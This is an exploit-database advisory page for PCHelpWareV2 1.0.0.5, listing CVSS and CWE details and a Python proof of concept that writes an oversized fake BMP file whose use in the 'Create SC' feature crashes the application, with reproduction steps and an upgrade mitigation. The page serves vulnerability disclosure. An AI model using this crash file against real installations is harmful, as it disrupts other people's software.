PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service (PoC)

vendor:

PCHelpWareV2

by:

Alejandra Sánchez

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: PCHelpWareV2

Affected Version From: 1.0.0.5

Affected Version To: 1.0.0.5

Patch Exists: Yes

Related CWE: N/A

CPE: a:uvnc:pchelpwarev2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

PCHelpWareV2 1.0.0.5 – ‘SC’ Denial of Service (PoC)

PCHelpWareV2 1.0.0.5 is vulnerable to a denial of service attack when a specially crafted BMP image is used. When the 'Create SC' button is clicked, the application crashes.

Mitigation:

Upgrade to the latest version of PCHelpWareV2.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service (PoC)
# Date: 15/04/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.uvnc.com/home.html
# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
# Version: 1.0.0.5
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "PCHelpWareV2_create_.py", it will create a image "exploit.bmp"
# 2.- Open PCHelpWareV2 Viewer
# 3.- Go to Tools -> Create SC
# 4.- Click on button -> Browse (any "Browse" button), and select the 'exploit.bmp' image created
# 5.- Click on button -> Create SC
# 6.- Crashed

buffer = "\x41" * 10000

f = open ("exploit.bmp", "w")
f.write(buffer)
f.close()